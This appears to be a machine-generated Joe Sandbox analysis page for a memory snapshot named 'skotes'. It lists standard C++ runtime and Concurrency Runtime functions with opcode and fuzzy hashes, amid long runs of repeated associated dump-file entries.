Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 4162181273-393685449
Opcode ID: c937b9197d8cf6831605bb173403006b2800bbe2928cd863cd5106bb9daa2b1b
Instruction ID: 7665d696f55c83d9e1fba258d6e695101f2bb3e3338295baebd19c09bb504be2
Opcode Fuzzy Hash: c937b9197d8cf6831605bb173403006b2800bbe2928cd863cd5106bb9daa2b1b
Instruction Fuzzy Hash: 49C1AA71800A09EFCF15EFA4C880AAEBBB9BF54315F42415AF8056B312D771DA59CF91

Function 00977364 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 009773B0
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 009773F2
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0097740E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00977419
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00977440

Strings

count, xrefs: 0097737E
ppVirtualProcessorRoots, xrefs: 00977438

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3897347962-3650809737
Opcode ID: 3a7b186e5d72e56a1973650e190ac2205d803a9aa04991efb022182ca535dfa2
Instruction ID: 9b95a0a9d49936fa94d9382b4b351082a6e11bb4627848c2ea283720d05bb777
Opcode Fuzzy Hash: 3a7b186e5d72e56a1973650e190ac2205d803a9aa04991efb022182ca535dfa2
Instruction Fuzzy Hash: 1E216735A04309EFCF14EF98D495AADB775BF45314F148069E80997361DB30AD00DF90

Function 009778E1 Relevance: 12.1, APIs: 8, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00977903

Part of subcall function 00975CB8: __EH_prolog3_catch.LIBCMT ref: 00975CBF
Part of subcall function 00975CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00975CF8

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0097792A
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00977936

Part of subcall function 00975CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00975D70
Part of subcall function 00975CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00975D7E

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00977982
Concurrency::location::_Assign.LIBCMT ref: 009779A3
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 009779AB
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 009779BD
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 009779ED

Part of subcall function 0097691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00976942
Part of subcall function 0097691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00976965

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
String ID:
API String ID: 1475861073-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: 73718e1ea8ce85bf7777b56b37a80f17197143dd069677bec8bbd4c0b518917a
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 3E314733B09251AACF16AAB844927FEFBB99F81300F04C5A9D58DD7242EB244D49C391

Function 00984840 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00984877
___except_validate_context_record.LIBVCRUNTIME ref: 0098487F
_ValidateLocalCookies.LIBCMT ref: 00984908
__IsNonwritableInCurrentImage.LIBCMT ref: 00984933
_ValidateLocalCookies.LIBCMT ref: 00984988

Strings

csm, xrefs: 0098491D

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 09c264e07f03cfc1bfec5ab02e89b03386d7bd072cc40e93c6d04450ae6210bf
Instruction ID: b260f871b8809ff166ae331901788c541f8c1faa9fbd577accddd0fbfd224bf3
Opcode Fuzzy Hash: 09c264e07f03cfc1bfec5ab02e89b03386d7bd072cc40e93c6d04450ae6210bf
Instruction Fuzzy Hash: D141B634A0020A9BCF10FF68D884B9E7BB9FF45728F148155F9149B392D736DA15CB91

Function 0097DD18 Relevance: 10.6, APIs: 7, Instructions: 117threadCOMMON

Download Yara Rule

APIs

Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 0097DD91
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 0097DDAE
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 0097DE14
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 0097DE29
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 0097DE3B
Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 0097DE4B
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 0097DE74

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
